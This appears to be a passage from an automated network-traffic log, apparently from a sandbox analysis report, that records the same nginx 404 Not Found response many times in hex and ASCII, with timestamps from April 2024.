Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:08:48 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:08:51 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:08:54 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:08:57 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:09:00 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:10:19 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:10:22 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:10:25 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:10:27 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable 